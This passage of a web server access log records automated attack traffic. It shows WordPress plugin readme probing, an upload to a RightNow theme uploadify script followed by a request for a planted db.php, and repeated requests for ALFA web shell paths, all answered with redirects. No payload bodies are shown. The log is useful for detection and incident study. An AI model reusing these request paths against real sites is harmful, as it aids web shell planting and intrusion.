"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:05 -0400] "GET /wp-content/plugins/jupiterx-core/readme.txt HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:12 -0400] "GET /wp-content/plugins/ht-mega-for-elementor/readme.txt HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:21 -0400] "GET /wp-content/plugins/wp-post-author/readme.txt HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:25 -0400] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:29 -0400] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:36 -0400] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:40 -0400] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:45 -0400] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:47 -0400] "GET /wp-content/plugins/royal-elementor-addons/readme.txt HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:50 -0400] "GET /wp-content/plugins/wp-email-capture/readme.txt HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:49:58 -0400] "GET /wp-content/plugins/zendrop-dropshipping-and-fulfillment/readme.txt HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:50:11 -0400] "GET /wp-content/plugins/wp-sms/readme.txt HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:50:14 -0400] "GET /wp-content/plugins/ninja-forms/readme.txt HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:50:20 -0400] "POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.1" 301 306 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:50:21 -0400] "GET /wp-content/uploads/settingsimages/db.php HTTP/1.1" 301 275 "-" "python-requests/2.32.4" 94.16.113.252 - - [12/Aug/2025:11:52:26 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.102.237.37 - - [12/Aug/2025:11:54:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:11:54:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:11:54:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:11:54:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:11:57:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:57:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:11:57:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:11:57:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:11:58:03 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:03 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "POST /alfacgiapi/bash.alfa HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "POST /alfacgiapi/bash.alfa HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "POST /alfacgiapi/py.alfa HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "POST /alfacgiapi/py.alfa HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "GET /alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:04 -0400] "GET /alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:05 -0400] "GET /alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:09 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:09 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:09 -0400] "POST /ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:09 -0400] "POST /ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:09 -0400] "POST /ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:10 -0400] "POST /ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:10 -0400] "GET /ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:10 -0400] "GET /ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:10 -0400] "GET /ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:16 -0400] "POST /assets/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:16 -0400] "POST /assets/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:16 -0400] "POST /assets/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:16 -0400] "POST /assets/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:16 -0400] "POST /assets/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:17 -0400] "POST /assets/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:17 -0400] "GET /assets/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:17 -0400] "GET /assets/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:17 -0400] "GET /assets/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:23 -0400] "POST /assets/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:23 -0400] "POST /assets/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:23 -0400] "POST /assets/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "POST /assets/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "POST /assets/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "POST /assets/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "GET /assets/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "GET /assets/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:24 -0400] "GET /assets/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:39 -0400] "POST /upload/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:40 -0400] "GET /upload/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:40 -0400] "GET /upload/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:40 -0400] "GET /upload/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:47 -0400] "POST /upload/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:47 -0400] "POST /upload/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:47 -0400] "POST /upload/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:47 -0400] "POST /upload/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:47 -0400] "POST /upload/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:48 -0400] "POST /upload/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:48 -0400] "GET /upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:48 -0400] "GET /upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:48 -0400] "GET /upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:54 -0400] "POST /uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:54 -0400] "POST /uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:54 -0400] "POST /uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:54 -0400] "POST /uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:54 -0400] "POST /uploads/alfacgiapi/py.alfa HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:55 -0400] "POST /uploads/alfacgiapi/py.alfa HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:55 -0400] "GET /uploads/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:55 -0400] "GET /uploads/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:55 -0400] "GET /uploads/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro 